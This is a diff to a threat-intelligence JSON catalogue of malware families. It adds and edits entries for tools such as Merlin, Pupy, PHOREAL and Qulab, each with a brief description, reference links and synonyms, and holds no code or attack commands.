[] @@ -9458,6 +11075,20 @@ "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", "value": "Luminosity RAT" }, + { + "description": " An uploader that can exfiltrate files to Dropbox.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "https://twitter.com/MrDanPerez/status/1097881406661902337" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb0167e5-3457-46ec-a6d1-b8e4ad9bc89b", + "value": "LunchMoney" + }, { "description": "", "meta": { @@ -9761,7 +11392,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", - "http://www.clearskysec.com/tulip/" + "http://www.clearskysec.com/tulip/", + "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" ], "synonyms": [], "type": [] @@ -9818,6 +11450,19 @@ "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", "value": "Mebromi" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd055701-89ad-41be-b4d9-69460876fdee", + "value": "MECHANICAL" + }, { "description": "", "meta": { @@ -9847,6 +11492,21 @@ "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", "value": "Medusa" }, + { + "description": "Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin", + "http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html", + "http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html", + "https://github.com/Ne0nd0g/merlin" + ], + "synonyms": [], + "type": [] + }, + "uuid": "427e4b41-adf6-4d4d-a83f-6d96b5ab4a3e", + "value": "Merlin" + }, { "description": "", "meta": { @@ -9963,6 +11623,7 @@ "https://github.com/gentilkiwi/mimikatz", "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", + "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/", " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], @@ -10279,7 +11940,9 @@ "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], - "synonyms": [], + "synonyms": [ + "MPK" + ], "type": [] }, "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", @@ -10300,7 +11963,7 @@ "value": "Multigrain POS" }, { - "description": "", + "description": " a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", @@ -10365,11 +12028,14 @@ "value": "MyloBot" }, { - "description": "", + "description": "Botnet with focus on banks in Latin America and South America.\r\nRelies on DLL Sideloading attacks to execute malicious DLL files.\r\nUses legitimate VMWare executable in attacks. \r\nAs of March 2019, the malware is under active development with updated versions coming out on persistent basis.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", - "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" + "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware", + "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector", + "http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html", + "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/" ], "synonyms": [], "type": [] @@ -10422,6 +12088,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/" ], @@ -10598,11 +12265,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", - "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", + "https://www.circl.lu/pub/tr-23/", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", - "https://www.circl.lu/pub/tr-23/" + "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", + "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/" ], "synonyms": [ "Recam" @@ -10631,6 +12299,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", + "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html", "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", "http://securitykitten.github.io/an-evening-with-n3utrino/", @@ -10795,8 +12464,9 @@ "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", + "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services" + "http://blogs.360.cn/post/analysis-of-apt-c-37.html" ], "synonyms": [ "Bladabindi" @@ -10865,10 +12535,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", + "https://www.cert.pl/en/news/single/nymaim-revisited/", + "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded", + "https://bitbucket.org/daniel_plohmann/idapatchwork", "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", - "https://www.cert.pl/en/news/single/nymaim-revisited/", - "https://bitbucket.org/daniel_plohmann/idapatchwork" + "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim" ], "synonyms": [ "nymain" @@ -11091,6 +12763,19 @@ "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", "value": "OpBlockBuster" }, + { + "description": "FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "092262b0-c631-400d-9f38-017cd59a14fd", + "value": "ORANGEADE" + }, { "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.", "meta": { @@ -11109,10 +12794,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", + "https://orcustechnologies.com/", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", + "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", - "https://orcustechnologies.com/" + "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/", + "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/" ], "synonyms": [], "type": [] @@ -11134,6 +12821,19 @@ "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", "value": "Ordinypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor", + "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "10a521e4-b3b9-4feb-afce-081531063e7b", + "value": "Outlook Backdoor" + }, { "description": "", "meta": { @@ -11246,6 +12946,19 @@ "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", "value": "parasite_http" }, + { + "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.peepy_rat", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "49321579-9dfe-45c6-80df-79467e4af65d", + "value": "Peepy RAT" + }, { "description": "", "meta": { @@ -11334,6 +13047,21 @@ "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", "value": "Philadephia Ransom" }, + { + "description": " Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal", + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf" + ], + "synonyms": [ + "Rizzo" + ], + "type": [] + }, + "uuid": "3aa6fd62-9b91-4136-af0e-08af7962ba4b", + "value": "PHOREAL" + }, { "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", "meta": { @@ -11341,8 +13069,9 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", "https://www.johannesbader.ch/2016/02/phorpiex/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", - "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", - "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", + "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", + "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" ], "synonyms": [ "Trik" @@ -11519,20 +13248,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", "https://community.rsa.com/thread/185439", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", "https://securelist.com/time-of-death-connected-medicine/84315/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf" ], @@ -11566,6 +13296,7 @@ "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", "http://blogs.360.cn/post/APT_C_01_en.html", @@ -11665,6 +13396,19 @@ "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", "value": "poscardstealer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0215eae2-0ab7-4567-8ac6-1be36a7893a6", + "value": "PoshC2" + }, { "description": "", "meta": { @@ -11691,6 +13435,19 @@ "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", "value": "PowerDuke" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz", + "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9e3aaf82-268b-47d1-b953-3799c5e1f475", + "value": "powerkatz" + }, { "description": "", "meta": { @@ -11705,11 +13462,13 @@ "value": "PowerPool" }, { - "description": "", + "description": "A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", - "https://lokalhost.pl/gozi_tree.txt" + "https://lokalhost.pl/gozi_tree.txt", + "https://www.thesecuritybuddy.com/malware-prevention/what-is-powersniff-malware/", + "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/" ], "synonyms": [], "type": [] @@ -11724,6 +13483,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", + "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], @@ -11750,6 +13510,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator", + "https://securelist.com/a-predatory-tale/89779", "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/" ], "synonyms": [], @@ -11805,6 +13566,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", + "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/", "https://twitter.com/mesa_matt/status/1035211747957923840" ], "synonyms": [], @@ -11833,7 +13595,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", - "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html", + "https://cert.gov.ua/news/42", + "https://blog.threatstop.com/russian-apt-gamaredon-group", + "https://cert.gov.ua/news/46" ], "synonyms": [], "type": [] @@ -11870,20 +13636,22 @@ "value": "Punkey POS" }, { - "description": "", + "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", - "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://github.com/n1nj4sec/pupy" + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://github.com/n1nj4sec/pupy", + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" ], "synonyms": [], "type": [] }, "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", - "value": "pupy" + "value": "pupy (Windows)" }, { "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.", @@ -11961,8 +13729,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", - "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", + "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", + "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" ], "synonyms": [ @@ -12009,9 +13778,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", "http://contagiodump.blogspot.com/2010/11/template.html", + "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", @@ -12078,15 +13848,17 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/quasar/QuasarRAT/tree/master/Client", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://twitter.com/malwrhunterteam/status/789153556255342596", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments" + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" ], "synonyms": [], "type": [] @@ -12094,6 +13866,19 @@ "uuid": "05252643-093b-4070-b62f-d5836683a9fa", "value": "Quasar RAT" }, + { + "description": "Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines.\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qulab", + "https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "728ce877-6f1d-4719-81df-387a8e395695", + "value": "Qulab" + }, { "description": "", "meta": { @@ -12151,7 +13936,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", - "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" + "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html" ], "synonyms": [ "brebsd" @@ -12279,6 +14064,20 @@ "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", "value": "RapidStealer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog", + "https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/", + "https://tracker.fumik0.com/malware/Rarog" + ], + "synonyms": [], + "type": [] + }, + "uuid": "184e5134-473c-4a01-9a8b-f4776f178fc9", + "value": "Rarog" + }, { "description": "", "meta": { @@ -12325,6 +14124,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", "https://www.f-secure.com/documents/996508/1030745/callisto-group", "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" ], @@ -12392,15 +14192,29 @@ "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", "value": "RedAlpha" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redaman", + "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "97dab1f9-724a-4560-9c70-90c0d1d7fa4b", + "value": "Redaman" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "http://blog.macnica.net/blog/2017/12/post-8c22.html", + "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" ], @@ -12484,6 +14298,7 @@ "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "http://malware-traffic-analysis.net/2017/12/22/index.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", @@ -12502,7 +14317,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", + "https://securelist.com/chafer-used-remexi-malware/89538/" ], "synonyms": [], "type": [] @@ -12527,7 +14343,8 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy", + "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html" ], "synonyms": [], "type": [] @@ -12566,11 +14383,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", + "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", "https://github.com/cocaman/retefe", - "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://www.govcert.admin.ch/blog/35/reversing-retefe", - "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/" + "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", + "https://github.com/Tomasuh/retefe-unpacker" ], "synonyms": [ "Tsukuba", @@ -12612,6 +14430,19 @@ "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", "value": "RGDoor" }, + { + "description": "Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof", + "https://blog.avast.com/rietspoof-malware-increases-activity" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ec67123a-c3bc-4f46-b9f3-569c19e224ca", + "value": "Rietspoof" + }, { "description": "", "meta": { @@ -12664,6 +14495,35 @@ "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", "value": "Ripper ATM" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "148a7078-3a38-4974-8990-9d5881f8267b", + "value": "Rising Sun" + }, + { + "description": "CyberInt states that Remote Manipulator System (RMS) is a legitimate tool developed by Russian organization TektonIT and has been observed in campaigns conducted by TA505 as well as numerous smaller campaigns likely attributable to other, disparate, threat actors. In addition to the availability of commercial licenses, the tool is free for non-commercial use and supports the remote administration of both Microsoft Windows and Android devices.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms", + "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf" + ], + "synonyms": [ + "Remote Manipulator System" + ], + "type": [] + }, + "uuid": "94339b04-9332-4691-b820-5021368f1d3a", + "value": "RMS" + }, { "description": "", "meta": { @@ -12704,6 +14564,20 @@ "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", "value": "Rofin" }, + { + "description": "A .NET variant of ps1.roguerobin", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin", + "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/", + 